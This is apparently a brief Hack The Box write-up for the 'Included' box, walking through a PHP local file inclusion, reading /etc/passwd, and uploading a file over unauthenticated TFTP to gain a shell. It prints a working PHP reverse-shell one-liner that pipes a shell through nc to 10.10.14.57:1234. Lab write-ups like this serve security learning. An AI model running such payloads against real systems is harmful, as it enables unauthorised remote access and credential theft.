HTB Included- LFI Exploitation in PHP
Lets look into another easy box called Included. First lets start with a nmap scan.
We can use the -sU flag to scan the udp ports.
nmap -sV -sC -p- -sU -T4 include.htb
Added the ip to the /etc/hosts so we do not need to remember the ip.
We are having a PHP application evident from the URL parameter.
Here the URL fetches the home.php form the web root. This kind of setup is likely to cause a LFI(Local File Inclusion) issue. It means we can access other files on the server if we provide its path in the URL parameter field. Lets try to get /etc/passwd file where passwords and usernames are stored.
It seems to work we have an LFI. Next we can try to escalate this with a reverse shell. Here is a complete cheat sheet on exploiting LFI in php ; CheatSheet.
The nmap scan will take a lot of time for scanning UDP. Its running a tftp service at port 69 and dhcpc server in port 68. What is TFTP? TFTP is the udp based FTP server. It has no authentication. It's usually setup to make file transfer faster. Lets try to access it.
Let's verify we can upload files to server through the TFTP server.
领英推荐
This means we can inject php reverse shell into the site and get a reverse shell. we can use the https://www.revshells.com/ to get the shell code faster.
We got the reverse shell after uploading the exploit.php script. Here is its contents
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.57 1234 >/tmp/f'); ?>
We got mike's credentials after some explorations.
We can conclude the exploration here, we already got too far with the LFI. This is a successful attack scenario of LFI escalated to shell access.
I am currently working on LiveAPI get all you backends documented automatically (AI based solution), do give it a try.